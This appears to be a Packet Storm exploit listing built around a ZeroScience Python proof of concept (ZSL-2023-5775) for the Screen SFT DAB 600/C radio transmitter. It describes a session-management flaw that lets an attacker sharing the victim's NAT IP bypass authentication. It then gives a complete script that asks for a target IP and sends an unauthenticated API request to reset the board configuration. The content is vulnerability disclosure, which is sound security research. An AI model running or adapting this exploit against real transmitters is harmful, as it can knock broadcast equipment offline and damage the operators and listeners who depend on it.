Screen SFT DAB 600/C Authentication Bypass / Reset Board Config

2023-05-1500:00:00

LiquidWorm, zeroscience.mk

packetstormsecurity.com

169

screen sft dab 600/c

authentication bypass

reset board config

exploit

vendor db elettronica telecomunicazioni spa

firmware 1.9.3

bios firmware 7.1

gui 2.46

fpga 169.55

dab transmitter

digital signal processing

rf domain

weak session management

nat

vulnerability

zsl-2023-5775

gjoko 'liquidworm' krstic.

JSON

`#!/usr/bin/env python3  
#  
#  
# Screen SFT DAB 600/C Authentication Bypass Reset Board Config Exploit  
#  
#  
# Vendor: DB Elettronica Telecomunicazioni SpA  
# Product web page: https://www.screen.it | https://www.dbbroadcast.com  
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/  
# Affected version: Firmware: 1.9.3  
# Bios firmware: 7.1 (Apr 19 2021)  
# Gui: 2.46  
# FPGA: 169.55  
# uc: 6.15  
#  
# Summary: Screen's new radio DAB Transmitter is reaching the highest  
# technology level in both Digital Signal Processing and RF domain.  
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the  
# digital adaptive precorrection and configuatio flexibility, the Hot  
# Swap System technology, the compactness and the smart system design,  
# the SFT DAB are advanced transmitters. They support standards DAB,  
# DAB+ and T-DMB and are compatible with major headend brands.  
#  
# Desc: The application suffers from a weak session management that can  
# allow an attacker on the same network to bypass these controls by reusing  
# the same IP address assigned to the victim user (NAT) and exploit crucial  
# operations on the device itself. By abusing the IP address property that  
# is binded to the Session ID, one needs to await for such an established  
# session and issue unauthorized requests to the vulnerable API to manage  
# and/or manipulate the affected transmitter.  
#  
# Tested on: Keil-EWEB/2.1  
# MontaVista® Linux® Carrier Grade eXpress (CGX)  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2023-5775  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php  
#  
#  
# 19.03.2023  
#  
  
import hashlib,datetime##########  
import requests,colorama#########  
from colorama import Fore, Style#  
colorama.init()  
print(Fore.RED+Style.BRIGHT+  
'''  
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████   
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██   
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████   
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██   
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██   
'''  
+Style.RESET_ALL)  
print(Fore.WHITE+Style.BRIGHT+  
'''  
ZSL and the Producers insist that no one  
submit any exploits of themselfs or others  
performing any dangerous activities.  
We will not open or view them.  
'''  
+Style.RESET_ALL)  
s=datetime.datetime.now()  
s=s.strftime('%d.%m.%Y %H:%M:%S')  
print('Starting API XPL -',s)  
t=input('Enter transmitter ip: ')  
e='/system/api/deviceManagement.cgx'  
print('Calling object: ssbtObj')  
print('CGX fastcall: deviceManagement::reset')  
t='http://'+t+e  
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',  
'Accept':'application/json, text/plain, */*',  
'Accept-Language':'ku-MK,en;q=0.9',  
'Accept-Encoding':'gzip, deflate',  
'User-Agent':'Dabber--',  
'Connection':'close'}  
j={'ssbtIdx':0,  
'ssbtType':'deviceManagement',  
'ssbtObj':{  
'reset':'true'  
}  
}  
r=requests.post(t,headers=bh,json=j)  
if r.status_code==200:  
print('Done.')  
else:  
print('Error')  
exit(-1)  
`

JSON